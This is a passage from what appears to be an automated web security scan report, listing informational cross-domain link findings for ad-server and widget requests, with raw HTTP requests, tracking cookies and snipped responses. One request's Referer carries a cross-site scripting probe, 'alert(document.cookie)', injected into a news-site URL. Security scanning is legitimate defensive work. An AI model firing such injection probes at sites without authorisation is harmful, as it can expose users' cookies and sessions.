Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=304YId6UCEb

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:21:15 GMT
Expires: Mon, 13 Jun 2011 11:21:16 GMT
Set-Cookie: 2=304YId6UCEb; Domain=.lucidmedia.com; Expires=Tue, 12-Jun-2012 11:21:16 GMT; Path=/
Content-Type: text/plain
Content-Length: 164
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73&external_user_id=3460050161923843111"/>');

18.79. http://admin.brightcove.com/js/BrightcoveExperiences.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admin.brightcove.com
Path:	/js/BrightcoveExperiences.js

Issue detail

The page was loaded from a URL containing a query string:

http://admin.brightcove.com/js/BrightcoveExperiences.js?m=1250540100

The response contains the following link to another domain:

http://www.adobe.com/go/getflash/

Request

GET /js/BrightcoveExperiences.js?m=1250540100 HTTP/1.1
Host: admin.brightcove.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "048f796cb881d04b21f716d0aa888786:1305829347"
Last-Modified: Thu, 19 May 2011 18:22:22 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 25496
Cache-Control: max-age=1200
Date: Mon, 13 Jun 2011 11:22:33 GMT
Connection: close

if(brightcove==undefined){var brightcove={};brightcove.getExperience=function(){alert("Please import APIModules_all.js in order to use the API.");};}
if(brightcove.experiences==undefined){brightcove.
...[SNIP]...
th-1)=="%"){container.style.display='block';}else{container.style.display='inline-block';}
container.id=containerID;var cdnURL=secureConnections?brightcove.secureCDNURL:brightcove.cdnURL;var linkHTML="<a href='http://www.adobe.com/go/getflash/' target='_blank'><img src='"+cdnURL+"/viewer/upgrade_flash_player2.gif' alt='Get Flash Player' width='314' height='200' border='0'>
...[SNIP]...

18.80. http://adopt.imiclk.com/emb/q previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adopt.imiclk.com
Path:	/emb/q

Issue detail

The page was loaded from a URL containing a query string:

http://adopt.imiclk.com/emb/q?size=160x600&m=3&l=1575606&c=162

The response contains the following link to another domain:

http://ad.yieldmanager.com/st?ad_type=ad&ad_size=160x600&section=1943639

Request

Response

18.81. http://adopt.imiclk.com/emb/q previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adopt.imiclk.com
Path:	/emb/q

Issue detail

The page was loaded from a URL containing a query string:

http://adopt.imiclk.com/emb/q?size=160x600&m=3&l=1575606&c=162

The response contains the following link to another domain:

http://ad.yieldmanager.com/st?ad_type=ad&ad_size=160x600&section=1692526

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 244
X-ADS-SRC: 6455
Date: Mon, 13 Jun 2011 11:19:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: AD2=3,1575606,3,2691397,162,CPM,5DuCA; domain=.imiclk.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=160x600&section=1692526"></SCRIPT>
...[SNIP]...

18.82. http://ads.bluelithium.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Issue detail

The page was loaded from a URL containing a query string:

http://ads.bluelithium.com/st?ad_type=iframe&ad_size=1x1&section=1921978

The response contains the following link to another domain:

http://content.yieldmanager.com/ak/q.gif

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1921978 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1190
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:02:19 GMT
Pragma: no-cache
Content-Length: 4577
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
</noscript><img src="http://content.yieldmanager.com/ak/q.gif" style="display:none" width="1" height="1" border="0" alt="" /></body>
...[SNIP]...

18.83. http://ads.tw.adsonar.com/adserving/getAds.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.tw.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://ads.tw.adsonar.com/adserving/getAds.jsp?previousPlacementIds=&placementId=1290669&pid=755772&ps=-1&zw=600&zh=240&url=http%3A//tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/&v=5&dct=Review%20of%20Game%20of%20Thrones%2C%20Baelor%20-%20Tuned%20In%20-%20TIME.com&metakw=uncategorized,game%20of%20thrones

The response contains the following links to other domains:

http://cdn.tacoda.at.atwola.com/an/qseg.html
http://time.sl.advertising.com/admin/advertisers/indexPl.jsp

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1290669&pid=755772&ps=-1&zw=600&zh=240&url=http%3A//tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/&v=5&dct=Review%20of%20Game%20of%20Thrones%2C%20Baelor%20-%20Tuned%20In%20-%20TIME.com&metakw=uncategorized,game%20of%20thrones HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16t51ko094k0ku; TData=99999%7C51134%7C56282%7C61674%7C57094%7C60740%7C56297%7C57130%7C57129%7C61576%7C51184%7C53380%7C60489%7C60515%7C52615%7C57289%7C52946%7C53656%7C55401%7C50507%7C50557%7C54255%7C53778%7C51182%7C54252%7C50961%7C54209%7C56988%7C57372%7C56780%7C56232%7C56142%7C56768%7C56761%7C56681%7C56153_Mon%2C%2006%20Jun%202011%2015%3A43%3A48%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:23:39 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 13752

           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
<td class="sps_1290795" style="height:12px;" nowrap="nowrap" align="right">
                                        <a href="http://time.sl.advertising.com/admin/advertisers/indexPl.jsp" target="_blank">

                                           Buy a link here

                                       </a>
...[SNIP]...
<td><iframe src="http://cdn.tacoda.at.atwola.com/an/qseg.html" width="1" height="1" frameborder="0" style="display:none"></iframe>
...[SNIP]...

18.84. http://adserv.impactengine.com/www/7u/8t/1p/2b/objembed.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserv.impactengine.com
Path:	/www/7u/8t/1p/2b/objembed.html

Issue detail

The page was loaded from a URL containing a query string:

http://adserv.impactengine.com/www/7u/8t/1p/2b/objembed.html?trackingTag=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NTlwMXVwYShnaWQkMTEwYWY1NTAtOTVhZS0xMWUwLWEyZTUtZWY3YWMzMWNiMjM1LHN0JDEzMDc5NjM1NjYzODgzMzcsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkdnRxdVQwd05qZXctLGN0JDI1LHlieCQzZVhDdHc5V1M5X2VWN01LaFBqZm5nLHIkMCkp/0/*&cacheBuster=1307963566.443875

The response contains the following link to another domain:

http://www.macromedia.com/go/getflash/

Request

GET /www/7u/8t/1p/2b/objembed.html?trackingTag=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NTlwMXVwYShnaWQkMTEwYWY1NTAtOTVhZS0xMWUwLWEyZTUtZWY3YWMzMWNiMjM1LHN0JDEzMDc5NjM1NjYzODgzMzcsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkdnRxdVQwd05qZXctLGN0JDI1LHlieCQzZVhDdHc5V1M5X2VWN01LaFBqZm5nLHIkMCkp/0/*&cacheBuster=1307963566.443875 HTTP/1.1
Host: adserv.impactengine.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Tue, 07 Jun 2011 13:09:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 08 Oct 2010 13:22:04 GMT
Accept-Ranges: bytes
Content-Length: 8175
Content-Type: text/html; charset=UTF-8
Age: 1196
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 6a8c75cbe0924ce971bdaac60860c9157ea500d6db9b25b354589e9f40e68e99ad9e16fa9b9952af
Via: 1.0 3829a1a874577a8522a3746a03714c50.cloudfront.net:11180 (CloudFront), 1.0 626a3781154e0078b5f1c9d72e16683a.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

<a href="http://www.macromedia.com/go/getflash/">Get Flash</a>
...[SNIP]...

18.85. http://adserv.impactengine.com/www/8i/8j/9q/km/objembed.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserv.impactengine.com
Path:	/www/8i/8j/9q/km/objembed.html

Issue detail

The page was loaded from a URL containing a query string:

http://adserv.impactengine.com/www/8i/8j/9q/km/objembed.html?trackingTag=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NWxlcmltNShnaWQkMWQ5NmU0NTYtOTVhZC0xMWUwLTk4NTMtNzc4ZTMyMzU0NzM5LHN0JDEzMDc5NjMxNTc5NDE0ODksc2kkMjQ1MjU1MSx2JDEuMCxhaWQkd0VORVNFd05qZUEtLGN0JDI1LHlieCQwT2RvTTJhMjZHMFh3Qmk0SXloTHpnLHIkMCkp/0/*&cacheBuster=1307963157.989055

The response contains the following link to another domain:

http://www.macromedia.com/go/getflash/

Request

GET /www/8i/8j/9q/km/objembed.html?trackingTag=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NWxlcmltNShnaWQkMWQ5NmU0NTYtOTVhZC0xMWUwLTk4NTMtNzc4ZTMyMzU0NzM5LHN0JDEzMDc5NjMxNTc5NDE0ODksc2kkMjQ1MjU1MSx2JDEuMCxhaWQkd0VORVNFd05qZUEtLGN0JDI1LHlieCQwT2RvTTJhMjZHMFh3Qmk0SXloTHpnLHIkMCkp/0/*&cacheBuster=1307963157.989055 HTTP/1.1
Host: adserv.impactengine.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Wed, 08 Jun 2011 03:01:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 08 Oct 2010 12:43:00 GMT
Accept-Ranges: bytes
Content-Length: 8041
Content-Type: text/html; charset=UTF-8
Age: 38707
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 523b0e4d3fd6f57754ba915a5903589f6ce0f76854a03111cf3f09393efa0a730193a124e7d01908
Via: 1.0 c308e47399ff34f618b4a1be11aee9b9.cloudfront.net:11180 (CloudFront), 1.0 626a3781154e0078b5f1c9d72e16683a.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

<a href="http://www.macromedia.com/go/getflash/">Get Flash</a>
...[SNIP]...

18.86. http://adserv.impactengine.com/www/j8/4t/w4/uf/objembed.html/@@1305142019@@ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserv.impactengine.com
Path:	/www/j8/4t/w4/uf/objembed.html/@@1305142019@@

Issue detail

The page was loaded from a URL containing a query string:

http://adserv.impactengine.com/www/j8/4t/w4/uf/objembed.html/@@1305142019@@?trackingTag=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NTNyMmtvZShnaWQkMTEwYWY1NTAtOTVhZS0xMWUwLWEyZTUtZWY3YWMzMWNiMjM1LHN0JDEzMDc5NjM1NjYzODgzMzcsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkMkVtdlQwd05qZXctLGN0JDI1LHlieCQzZVhDdHc5V1M5X2VWN01LaFBqZm5nLHIkMCkp/0/*&cacheBuster=1307963566.443102

The response contains the following link to another domain:

http://www.macromedia.com/go/getflash/

Request

GET /www/j8/4t/w4/uf/objembed.html/@@1305142019@@?trackingTag=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NTNyMmtvZShnaWQkMTEwYWY1NTAtOTVhZS0xMWUwLWEyZTUtZWY3YWMzMWNiMjM1LHN0JDEzMDc5NjM1NjYzODgzMzcsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkMkVtdlQwd05qZXctLGN0JDI1LHlieCQzZVhDdHc5V1M5X2VWN01LaFBqZm5nLHIkMCkp/0/*&cacheBuster=1307963566.443102 HTTP/1.1
Host: adserv.impactengine.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Thu, 09 Jun 2011 12:42:36 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 11 May 2011 20:08:53 GMT
Accept-Ranges: bytes
Content-Length: 8260
Content-Type: text/html; charset=UTF-8
Age: 3780
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 0977ddb7650971db538e72fe99a3686695c7b0eb89ec9a229b868badd1475e60aff5c3ddbf372891
Via: 1.0 35b60fc94656c4665da42ef6273cad71.cloudfront.net:11180 (CloudFront), 1.0 626a3781154e0078b5f1c9d72e16683a.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

<a href="http://www.macromedia.com/go/getflash/">Get Flash</a>
...[SNIP]...

18.87. http://adserv.impactengine.com/www/l3/df/ey/qw/objembed.html/@@1302711674@@ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserv.impactengine.com
Path:	/www/l3/df/ey/qw/objembed.html/@@1302711674@@

Issue detail

The page was loaded from a URL containing a query string:

http://adserv.impactengine.com/www/l3/df/ey/qw/objembed.html/@@1302711674@@?trackingTag=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NTUwZ3I3bChnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkQUJrSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCkp/0/*&cacheBuster=1307962869.581895

The response contains the following link to another domain:

http://www.macromedia.com/go/getflash/

Request

GET /www/l3/df/ey/qw/objembed.html/@@1302711674@@?trackingTag=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NTUwZ3I3bChnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkQUJrSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCkp/0/*&cacheBuster=1307962869.581895 HTTP/1.1
Host: adserv.impactengine.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:55:15 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 28 Apr 2011 14:11:08 GMT
Accept-Ranges: bytes
Content-Length: 8335
Content-Type: text/html; charset=UTF-8
Age: 65849
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 592b8dd44e1510ae5c5af1b8aaf415d3a536cd0a6e3a898d0b0562ae2d4a32f11a488a42dbeada34
Via: 1.0 c58f6a2285e871d13e8d6606ca403950.cloudfront.net:11180 (CloudFront), 1.0 7e373c350af40baa982499c6017ca90a.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

<a href="http://www.macromedia.com/go/getflash/">Get Flash</a>
...[SNIP]...

18.88. http://adserver.veruta.com/cookiematch.fcgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserver.veruta.com
Path:	/cookiematch.fcgi

Issue detail

The page was loaded from a URL containing a query string:

http://adserver.veruta.com/cookiematch.fcgi?pnid=3000003&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=567&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=567&external_user_id=1461734246|1305465412|8|2&expiration=1310556077

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=567&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmid=20772879917; ueid=1461734246|1305465412|8|2; lpnid=3000003

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 13 Jun 2011 11:21:17 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Content-Length: 170

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=567&external_user_id=1461734246|1305465412|8|2&expiration=1310556077"/>');

18.89. http://api.twitter.com/1/FanSided/lists//statuses.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/1/FanSided/lists//statuses.json

Issue detail

The page was loaded from a URL containing a query string:

http://api.twitter.com/1/FanSided/lists//statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1307962963626=cachebust

The response contains the following links to other domains:

http://si0.twimg.com/sticky/error_pages/favicon.ico
http://si0.twimg.com/sticky/error_pages/twitter_logo_header.png

Request

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:02:46 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1307962966-69972-34459
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 13 Jun 2011 11:02:46 GMT
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 15a0063758dc8a6e2ca5b901d282ee09491fb005
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
Content-Length: 9854
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
</title>
<link href="//si0.twimg.com/sticky/error_pages/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<style type="text/css">
...[SNIP]...
<a href="//twitter.com"><img src="//si0.twimg.com/sticky/error_pages/twitter_logo_header.png" width="155" height="36" alt="Twitter.com" /></a>
...[SNIP]...

18.90. http://apps.conduit-banners.com/Twackle-Twackle_Sports previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apps.conduit-banners.com
Path:	/Twackle-Twackle_Sports

Issue detail

The page was loaded from a URL containing a query string:

http://apps.conduit-banners.com/Twackle-Twackle_Sports?appid=6bbfb12c-21ba-4676-8622-1bb3746f0014&script=togo&type=3

The response contains the following link to another domain:

http://apps.conduit.com/Images/UserComponents/2go_small.png

Request

GET /Twackle-Twackle_Sports?appid=6bbfb12c-21ba-4676-8622-1bb3746f0014&script=togo&type=3 HTTP/1.1
Host: apps.conduit-banners.com
Proxy-Connection: keep-alive
Referer: http://www.twackle.com/headlines
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 13 Jun 2011 11:25:20 GMT
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 4517

function imgToGoOnLoad__322051432(imgObj) {var elm = imgObj,func__322051432 = function(){
SharedItems.Togo.Manager.createItem('6bbfb12c-21ba-4676-8622-1bb3746f0014','','2598066','Twackle','Twack
...[SNIP]...
<a><img style="cursor: pointer; visibility: visible;" src="http://apps.conduit.com/Images/UserComponents/2go_small.png" title="Grab an app for your browser" alt="Twackle Sports" border="0" onload="imgToGoOnLoad__322051432(this);" ></img>
...[SNIP]...

18.91. http://as.jivox.com/player/iabplayer.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/iabplayer.php

Issue detail

The page was loaded from a URL containing a query string:

http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver

The response contains the following links to other domains:

http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http:/www.quatros.com
http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg

Request

GET /player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

18.92. http://as.jivox.com/player/iabplayer.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/iabplayer.php

Issue detail

The page was loaded from a URL containing a query string:

